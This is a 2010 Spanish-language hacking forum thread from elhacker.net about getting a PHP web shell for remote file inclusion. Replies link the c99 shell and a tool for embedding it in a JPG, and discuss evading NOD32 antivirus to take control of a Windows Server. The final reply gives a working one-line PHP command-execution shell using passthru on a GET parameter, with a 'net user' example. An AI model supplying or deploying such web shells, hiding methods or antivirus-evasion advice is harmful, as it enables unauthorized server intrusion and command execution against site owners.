elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Security Series.XSS. [Cross Site Scripting]


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  Shell pho en imagen
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Shell pho en imagen  (Leído 5,655 veces)
wizache

Desconectado Desconectado

Mensajes: 143


El que poco sabe poco vive


Ver Perfil WWW
Shell pho en imagen
« en: 16 Febrero 2010, 21:17 pm »

Hola alguiens sabe donde puedo conseguir un shell de php para hacer rfi?
Saludos
En línea

WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.606


Sin conocimiento no hay espíritu


Ver Perfil WWW
Re: Shell pho en imagen
« Respuesta #1 en: 17 Febrero 2010, 10:19 am »

La c99:
http://pastebin.com/f7c1ad9c2

EditJPGcom para inyectar la c99 en el jpg:
http://makovice.nipax.cz/download/edjpgcom.exe

Saludos.
En línea

Beginner_Hax0r

Desconectado Desconectado

Mensajes: 4


Ver Perfil
Re: Shell pho en imagen
« Respuesta #2 en: 17 Febrero 2010, 17:51 pm »

El paste de la c99 de ese link casi llega a las 6000 lineas de codigo ... y lo detectan 6 Antivirus, aun asi estaria bien pero ...

He provado a subirla a un ftp para ver si funcionava, pero no muestra nada, y si, el codigo PHP esta activado, da error por que dice que tiene demasiado codigo, se peta, y me propone detener el script ...

He buscado la c99, y despues de encontrarme con links rotos o borrados y encontrar un par de c99, todas me dan algun error, algunas son detectadas, otras se saltan algun antivirus ... prove a cifrar la original, pero luego tampoco me funciona, y ya no se que hacer ...

No pediria ayuda si no la necesitara ... Alguien tiene una c99 funcional e indetectable ?

PD: Gracias por el EditJPG, no conocia esa tecnica.
En línea

WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.606


Sin conocimiento no hay espíritu


Ver Perfil WWW
Re: Shell pho en imagen
« Respuesta #3 en: 17 Febrero 2010, 18:33 pm »

lo de la c99 indetectable sería raro porque no se usa en windows y un servidor en linux es raro verlo con antivirus funcionales porque la seguridad tiene otro enfoque.

http://foro.elhacker.net/nivel_web/c99_shellphp_cifrado_en_base_64-t169037.0.html
El link de rapidshare que sale en ese post todavía funciona.
En línea

Beginner_Hax0r

Desconectado Desconectado

Mensajes: 4


Ver Perfil
Re: Shell pho en imagen
« Respuesta #4 en: 18 Febrero 2010, 16:07 pm »

La c99 no funciona en Windows ??? [...] He visto videos de rooteo de windows con shell c99 subida a una web, y utilizaba codigos de cmd para activar un control remoto para entrar a el pc en cuestion ... por eso la busco indetectable, por que el windows que quiero si que tiene Antivirus, ademas el servidor es bueno y puede que la reconozca ... sino, que me recomiendas ? Es un Windows Server, el Antivirus creo que es NOD32, tengo acceso a la web como admin, no necesito RFI, puedo subir la shell y quiero acceso al PC donde esta alojada la web.

PD: El link que posteaste ya lo habia checado antes, lo detectan varios, aunque burla al nod32, no se si el servidor petara ...

http://scanner.novirusthanks.org/file/14bf5ffec57b5703b8332f5a9771e027/

(Copia no distribuida)
En línea

Darioxhcx


Desconectado Desconectado

Mensajes: 2.294


Ver Perfil
Re: Shell pho en imagen
« Respuesta #5 en: 18 Febrero 2010, 19:02 pm »

La c99 no funciona en Windows ??? [...] He visto videos de rooteo de windows con shell c99 subida a una web, y utilizaba codigos de cmd para activar un control remoto para entrar a el pc en cuestion ... por eso la busco indetectable, por que el windows que quiero si que tiene Antivirus, ademas el servidor es bueno y puede que la reconozca ... sino, que me recomiendas ? Es un Windows Server, el Antivirus creo que es NOD32, tengo acceso a la web como admin, no necesito RFI, puedo subir la shell y quiero acceso al PC donde esta alojada la web.

PD: El link que posteaste ya lo habia checado antes, lo detectan varios, aunque burla al nod32, no se si el servidor petara ...

http://scanner.novirusthanks.org/file/14bf5ffec57b5703b8332f5a9771e027/

(Copia no distribuida)
la c99 no es la unica que sirve.. tenes la r57 u otras mismas...
busca shells en google hermano, en formato .txt y anda probando.. ademas no sabes si pudiste subir el php , o ya probaste de subir un php ?
capas que te dice , carga exitosa , pero no sube en realidad...

saludos
En línea

nacho87

Desconectado Desconectado

Mensajes: 71


Ver Perfil WWW
Re: Shell pho en imagen
« Respuesta #6 en: 19 Febrero 2010, 09:08 am »

Si lo único que buscas es ejecutar comandos usa ésto:

Código
  1. <?php echo passthru($_GET['cmd']); ?>

Con ...?cmd=net user....

Saludos!
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
agregar una shell a una imagen .
Hacking
Gabriel sombrero blanco 0 2,387 Último mensaje 12 Octubre 2017, 00:49 am
por Gabriel sombrero blanco
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines